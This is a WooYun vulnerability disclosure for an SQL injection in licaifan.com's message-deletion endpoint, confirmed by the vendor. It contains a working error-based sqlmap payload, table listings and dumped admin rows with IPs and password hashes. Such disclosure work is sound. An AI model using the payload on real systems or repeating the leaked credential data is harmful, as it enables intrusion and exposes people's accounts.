当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115603

漏洞标题:理财范某漏洞可导致所有用户所有信息泄露

相关厂商:licaifan.com

漏洞作者: 追逐影子的人

提交时间:2015-06-08 09:54

修复时间:2015-07-23 10:14

公开时间:2015-07-23 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

我是皮吐皮跟风少年

详细说明:

登陆后查看消息 可以删除消息

Snip20150522_1.png


数据包如下:
http://www.licaifan.com:80/user/delMessage
post msg_id=1111&action=delete
msg_id参数存在sql注入

Snip20150522_2.png

漏洞证明:

web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] licaifan
[*] test

Database: licaifan
[104 tables]
+--------------------------+
| YiiSession               |
| user                     |
| account                  |
| account_cash             |
| account_log_150202       |
| account_recharge         |
| adm_admin                |
| adm_award_log            |
| adm_company_users        |
| adm_email_template       |
| adm_login_record         |
| adm_logs                 |
| adm_other_type           |
| area                     |
| award_log                |
| card_auth                |
| consumer_credit_gain_log |
| consumer_invest_log      |
| cps_lanlicai             |
| error                    |
| exp_code                 |
| exp_winner               |
| frozen_log               |
| hlf                      |
| hlf_invest_detail_1900   |
| hlf_invest_log           |
| incubator_apply          |
| invest_bonus_log         |
| invest_bonus_log_bak     |
| invest_log               |
| invest_log_bak           |
| invest_view              |
| ios_download             |
| ios_push                 |
| lease_gain_log           |
| lease_invest_log         |
| lease_project            |
| lease_project_payment    |
| lease_project_repayment  |
| loan_application         |
| login_record             |
| meet_apply               |
| message                  |
| mobile_area              |
| mobile_change_log        |
| nation                   |
| net_invest_log           |
| oauth_access_tokens      |
| oauth_clients            |
| oauth_jwt                |
| oauth_refresh_tokens     |
| oauth_scopes             |
| oneYearCoupons           |
| payment                  |
| project_apply            |
| project_award            |
| project_comment          |
| project_company          |
| project_gain_record      |
| project_invest_record    |
| project_payment          |
| project_pic              |
| project_project          |
| project_related          |
| project_repayment        |
| project_transfer         |
| project_transfer2        |
| project_view             |
| project_vouch            |
| protected_answer         |
| protected_questions      |
| recharge_info_log        |
| redemption               |
| redemption_detail        |
| remindmsg_log            |
| research                 |
| score_log                |
| score_setting            |
| score_to_money           |
| service_log              |
| sms_code_check_record    |
| sms_send_log             |
| supertracker             |
| system_setting           |
| trade_gain_log           |
| trade_invest_log         |
| trade_project            |
| trade_project_payment    |
| trade_project_repayment  |
| transfer_available       |
| transfer_log             |
| upload_pic               |
| user_auth                |
| user_extend_mobile       |
| user_login_log           |
| user_qq_userinfo         |
| user_refer               |
| user_remind              |
| user_sina_userinfo       |
| user_tzj                 |
| user_weixin_userinfo     |
| vouch_pic                |
| whos_online              |
| withdraw_log             |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
Database: licaifan
Table: system_setting
[15 entries]
+----+-----------------------+----------+-------------+
| id | type                  | value    | description |
+----+-----------------------+----------+-------------+
| 1  | invest_threshold      | 1000     | 投资起点为1000元  |
| 2  | itemsPerPageInAccount | 10       | 账户管理每页显示个数  |
| 3  |                       | 10       | 消息每页显示个数    |
| 4  | announcement          | <blank>  | 网站公告        |
| 5  | minimum_withdraw      |          | 最低提现额度      |
| 6  | payment               | pay19    | 一九付         |
| 7  | lucky                 | 1403     | NULL        |
| 8  | withdraw_fee_type     |          | 提现手续费收取方式   |
| 9  | repayment             |          | 一九付         |
| 10 | wappayment            |          | 连连支付        |
| 11 | payment_bak           | shengpay |             |
| 12 | payment_verify        | llpay    | 连连支付        |
| 13 | apppayment            | wap      | 客户端充值渠道     |
| 14 | coupon_probability    | 100      | 周年红包活动中奖率   |
| 15 | withdraw_fee_number   | 3        | 免手续费提现次数    |
+----+-----------------------+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
Database: licaifan
Table: adm_admin
[36 entries]
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
| admin_id | addip           | status | addtime             | userName   | userPassword                             |
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
|          | 203.100.80.24   | 1      |                     | admin      |                                          |
| 1        | 106.185.46.44   | 1      |                     |            | 9f59c01c21bea721ca5cbba9984cd25e1c479a18 |
|          | 203.100.93.15   |        | 2014-10-29 10:05:22 |            |                                          |
|          | 203.100.93.15   |        |                     |            |                                          |
|          | 106.120.244.158 |        | 2014-09-29 18:11:27 |            |                                          |
| 1        |                 |        |                     |            | 79759dbab437869857f4443d81a3e25f9e9b2300 |
| 1        |                 |        |                     |            |                                          |
| 1        | 203.100.93.15   |        |                     |            |                                          |
| 1        |                 |        |                     |            |                                          |
|          |                 |        | 2015-02-15 11:15:53 | luoxin     |                                          |
|          |                 | 1      |


可获取所有用户用户名密码 身份信息 银行卡信息 交易密码 手机号 余额 等等等等

修复方案:

使用框架的查询方法

版权声明:转载请注明来源 追逐影子的人@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-08 10:13

厂商回复:

多谢漏洞作者给我们提出这么重要的问题~我们会自信检查自己的网站,避免这种漏洞的出现!!

最新状态:

暂无